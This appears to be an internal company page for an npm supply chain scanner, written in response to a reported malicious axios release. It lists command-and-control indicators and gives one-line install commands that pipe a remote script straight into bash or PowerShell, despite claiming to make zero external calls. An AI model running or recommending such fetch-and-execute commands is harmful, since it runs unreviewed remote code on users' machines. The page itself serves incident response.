Air-gapped • Zero external calls

Supply Chain Scanner

Self-hosted, PCI-DSS compliant npm supply chain threat detection for VeryPay infrastructure

Threat Summary

On March 30, 2026, attackers published malicious versions of the axios HTTP client — v1.14.1 and v0.30.4 — to npm. These packages contained a Remote Access Trojan (RAT) that established reverse shells, exfiltrated environment variables (API keys, database credentials), and persisted via OS-level mechanisms.
C2: sfrclak.com:8000 IP: 142.11.206.73 Dropper: plain-crypto-js Worm: Shai-Hulud

Quick Start

1
Open a terminal
macOS: press ⌘ Cmd + Space, type Terminal, press Enter.
Windows: press Win + X, select PowerShell.
2
Paste the command
Click the Copy button next to your OS below, go back to the terminal, right-click to paste, then press Enter.
3
Read the result
The scanner will show CLEAN or INFECTED. If infected, follow the on-screen remediation steps.
macOS / Linux
curl -sSL https://scan.dev.verypay.io/scan.sh | bash
Scans your home directory for compromised lockfiles, checks host IOCs, and exports detection rules. Takes ~5 seconds.
Linux Server (Docker + systemd + cron)
curl -sSL https://scan.dev.verypay.io/scan.sh | bash -s -- --server
Same as above plus 4 extra checks: scans inside Docker containers, checks systemd services, crontabs, and journalctl logs for C2 activity.
Windows (PowerShell)
irm https://scan.dev.verypay.io/scan.ps1 | iex
PowerShell equivalent. Checks Registry persistence, Windows RAT files (wt.exe, system.bat), DNS cache, and scheduled tasks.
CI / Pipeline Mode (JSON output)
curl -sSL https://scan.dev.verypay.io/scan.sh | bash -s -- --ci --project-dir .
Non-interactive mode for Jenkins/GitHub Actions. Outputs JSON only, scans current directory, returns exit code 1 if infected.
Common Options & Examples
--project-dir ~/Work Only scan lockfiles under a specific directory instead of your entire home folder
--server Enable server mode — adds Docker, systemd, cron, and journalctl checks (Linux only)
--auto-remediate Automatically kill malicious processes, remove RAT files, and block C2 domain in /etc/hosts
--json Suppress terminal output, print only the JSON report to stdout (useful for piping to other tools)
-y Skip the confirmation prompt — useful for automation or when piping to bash

16 Checks Across 4 Layers

LAYER 1 — 5 checks
Package Audit
Lockfile scanning, malicious version detection, dropper directory checks, npm cache analysis, install script anomalies
LAYER 2 — 5 checks
Host IOC Sweep
RAT files on disk, process scanning, network connections to C2, DNS cache inspection, persistence mechanisms
LAYER 3 — 4 checks
Forensic Artifacts
Hidden lockfile analysis, npm log forensics, shell history traces, Shai-Hulud worm detection
LAYER 4 — 2 checks
Content & Export
YARA-equivalent pattern scan, Snort IDS rules and YARA rule export for infrastructure teams

PCI-DSS Compliance Mapping

RequirementDescriptionScanner Coverage
5.2Anti-malware mechanismsIOC detection + YARA rules detect known RAT payloads
6.3.2Software inventoryLockfile audit inventories all third-party dependencies
6.5.4Supply chain attack protectionDetects compromised packages and C2 callbacks
10.2Audit trail for eventsJSON report with timestamped check-by-check results
11.4Intrusion detectionExported Snort rules for network IDS deployment
11.5File integrity monitoringContent pattern scan detects malicious code in any path
12.10Incident response planAuto-remediation steps with credential rotation checklist

Not a Developer? Here's What to Do

You don't need to run the scanner yourself. Follow these steps to make sure your machine is checked by the security team.

1
Ask Your Team Lead
Forward this page to your Team Lead or DevOps engineer and ask them to run the scanner on your machine. They will open a terminal and paste one command — it takes less than 10 seconds.
2
Check the Result
After the scan finishes, the screen will show one of two results:
CLEAN — your machine is safe, no action needed.
INFECTED — follow the on-screen steps or disconnect from the network immediately and contact the security team.
3
If You Suspect Something
If your machine is acting strange — unusual slowness, unfamiliar processes, unexpected network activity — do not wait for a scan. Disconnect from the network and report to the security team immediately via Teams or email.
Important: If you recently installed or updated any npm packages and received the result INFECTED, assume all credentials on your machine are compromised. Change your passwords, revoke API keys, and rotate SSH keys. Your team lead will guide you through the full checklist.
View Scan Report

Client-side JSON viewer — no data leaves your browser